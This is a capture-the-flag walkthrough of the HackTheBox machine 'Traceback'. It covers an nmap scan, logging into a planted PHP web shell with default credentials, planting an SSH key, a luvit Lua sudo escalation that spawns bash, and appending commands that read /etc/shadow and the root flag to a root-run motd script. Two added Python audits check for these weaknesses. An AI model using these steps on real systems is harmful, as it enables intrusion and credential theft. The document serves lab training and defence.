TRACEBACK WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 12:03 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 12:03
    Completed NSE at 12:03, 0.00s elapsed
    Initiating NSE at 12:03
    Completed NSE at 12:03, 0.00s elapsed
    Initiating NSE at 12:03
    Completed NSE at 12:03, 0.00s elapsed
    Initiating Ping Scan at 12:03
    Scanning 10.10.10.181 [4 ports]
    Completed Ping Scan at 12:03, 0.44s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:03
    Completed Parallel DNS resolution of 1 host. at 12:03, 0.57s elapsed
    Initiating SYN Stealth Scan at 12:03
    Scanning 10.10.10.181 [1000 ports]
    Discovered open port 22/tcp on 10.10.10.181
    Discovered open port 80/tcp on 10.10.10.181
    Completed SYN Stealth Scan at 12:03, 3.45s elapsed (1000 total ports)
    Initiating Service scan at 12:03
    Scanning 2 services on 10.10.10.181
    Completed Service scan at 12:03, 6.88s elapsed (2 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.181
    Retrying OS detection (try #2) against 10.10.10.181
    Retrying OS detection (try #3) against 10.10.10.181
    Retrying OS detection (try #4) against 10.10.10.181
    Retrying OS detection (try #5) against 10.10.10.181
    Initiating Traceroute at 12:03
    Completed Traceroute at 12:03, 0.66s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 12:03
    Completed Parallel DNS resolution of 2 hosts. at 12:03, 0.30s elapsed
    NSE: Script scanning 10.10.10.181.
    Initiating NSE at 12:03
    Completed NSE at 12:04, 8.03s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 1.43s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Nmap scan report for 10.10.10.181
    Host is up (0.25s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
    |   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
    |_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET POST OPTIONS HEAD
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Help us
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:

    Uptime guess: 0.580 days (since Fri May 29 22:08:32 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 5900/tcp)
    HOP RTT       ADDRESS
    1   659.58 ms 10.10.14.1
    2   659.59 ms 10.10.10.181

    NSE: Script Post-scanning.
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Initiating NSE at 12:04
    Completed NSE at 12:04, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 37.69 seconds
            Raw packets sent: 1141 (54.230KB) | Rcvd: 1103 (47.658KB)

WEB ENUMERATION PORT 80

Let's first check the webpage.

Let's check its source code.

Here we see that something is written in the comments, so let's Google it.

After testing a bunch of the candidates I got one of them working, Smevk.php, so let's browse to this PHP file.
The credentials are the defaults, admin and admin; we can read them in the PHP file.
After logging in I got a webpage like this.

Looking at this page, we can read and write files on the actual machine, so let's use our own SSH key pair and copy the public key to webadmin, as we cannot use sysadmin.
After copying the public key into /home/webadmin/.ssh/authorized_keys we can SSH in as webadmin.

SSH WEBADMIN THEN SYSADMIN

As we can see, we have access to sysadmin.

After trying to get into sysadmin directly, I failed.

It's time to escalate our user's privileges. First, let's check what webadmin is allowed to run with sudo:

    sudo -l

After searching on Google I saw that I can get access as sysadmin using a couple of simple commands, so I ran them to check whether it works:

    # luvit is a Lua runtime, so a one-line Lua script is enough to spawn a shell
    echo "os.execute('/bin/bash')" > privesc.lua

    # run the script as sysadmin, which sudo permits for luvit
    sudo -u sysadmin /home/sysadmin/luvit privesc.lua

Here we got sysadmin's user access!
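A check a defender can run against this kind of sudo rule, added here as an example and not the author's code: it parses `sudo -l` output and flags rules that hand an interpreter such as luvit to another user, since any such rule is equivalent to a shell as that user. The sample output is constructed to match this box's rule, and the interpreter list is an assumption, not an exhaustive catalogue.

```python
import os
import re

# Interpreters and runtimes that execute arbitrary code for whoever invokes them.
# luvit (a Lua runtime, as on this box) is the case at hand; the rest of the list
# is an editor-chosen starting point, not an exhaustive one.
CODE_RUNNERS = {"luvit", "lua", "lua5.1", "lua5.3", "python", "python2", "python3",
                "perl", "ruby", "node", "php", "bash", "sh", "dash", "zsh"}

# One rule line of `sudo -l`: "(runas) TAG: cmd, cmd"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return the rules listed under 'may run the following commands' in `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()      # "(user : group)" -> user
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "nopasswd": nopasswd, "cmd": cmd.strip()})
    return rules

def find_code_runner_rules(text):
    """Rules whose command is an interpreter (or ALL): the caller can then run any code
    as the target user, exactly what a one-line os.execute() Lua script does with luvit."""
    findings = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule["cmd"].split()[0])
        if rule["cmd"] == "ALL" or binary in CODE_RUNNERS:
            findings.append(rule)
    return findings

# Constructed sample modelled on this box's rule; not captured from the machine.
SAMPLE = """Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for f in find_code_runner_rules(SAMPLE):
        print("runas=%s nopasswd=%s cmd=%s" % (f["runas"], f["nopasswd"], f["cmd"]))
```

Run it with the real `sudo -l` output of each account during a sudoers review; the fix for a hit is to replace the interpreter with a purpose-built wrapper script that takes no user-controlled code.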

GETTING ROOT ACCESS

Let's run pspy32 to check the running processes.

We got a process which is unique!

Let's Google this.

After Googling, let's look at the file permissions and owners.

They belong to root and sysadmin.

The files are updated every 30 seconds.

Let's put our command in 00-header: the output of this file is shown at SSH login time, so whatever we add to it runs at the next login.

    # append, so the script keeps its shebang line and executable bit
    echo "cat /etc/shadow" >> 00-header

We have to log in to webadmin over SSH again in another terminal, before the file is restored again.

Here we got our output!

    echo "cat /root/root.txt" >> 00-header

Here we go with our root flag!
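An audit for the root side of this chain, added here as an example rather than the author's code: the scripts in /etc/update-motd.d are executed as root by pam_motd at every SSH login, so any of them that a non-root account can write is a root-level foothold. The sample listing is constructed to mirror the root-owned, sysadmin-group-writable files found above; gid 1001 and the file names other than 00-header are assumed values.

```python
import os
import stat

def script_write_risks(uid, gid, mode, trusted_gid=0):
    """Reasons a root-executed script could be modified by a non-root account.
    `mode` is st_mode; only root (uid 0) and `trusted_gid` may hold write access."""
    reasons = []
    if uid != 0:
        reasons.append("owned by uid %d, not root" % uid)
    if mode & stat.S_IWGRP and gid != trusted_gid:
        reasons.append("group-writable by gid %d" % gid)
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_entries(entries):
    """entries: iterable of (name, uid, gid, st_mode). Returns {name: reasons} for the
    executable regular files a non-root account could edit; run-parts skips the rest."""
    findings = {}
    for name, uid, gid, mode in entries:
        if not stat.S_ISREG(mode) or not mode & stat.S_IXUSR:
            continue
        reasons = script_write_risks(uid, gid, mode)
        if reasons:
            findings[name] = reasons
    return findings

def audit_motd_dir(path="/etc/update-motd.d"):
    """Audit a live directory: pam_motd runs these scripts as root at every SSH login."""
    entries = []
    for name in sorted(os.listdir(path)):
        st = os.stat(os.path.join(path, name))
        entries.append((name, st.st_uid, st.st_gid, st.st_mode))
    return audit_entries(entries)

# Constructed sample modelled on this box (not the machine's real listing): root-owned
# scripts whose group is a non-root account and which are group-writable, plus two
# entries that are fine.
SAMPLE_ENTRIES = [
    ("00-header",    0, 1001, 0o100775),  # root-owned, g+w for a non-root gid
    ("10-help-text", 0, 1001, 0o100775),
    ("50-motd-news", 0, 0,    0o100755),  # root:root, only root can write
    ("README",       0, 0,    0o100644),  # not executable, run-parts ignores it
]

if __name__ == "__main__":
    for name, why in audit_entries(SAMPLE_ENTRIES).items():
        print("%s -> %s" % (name, "; ".join(why)))
```

A cron job that keeps re-copying such files, as on this box, does not remove the exposure: it only narrows the window, and each login in that window still runs the edited script as root.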

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
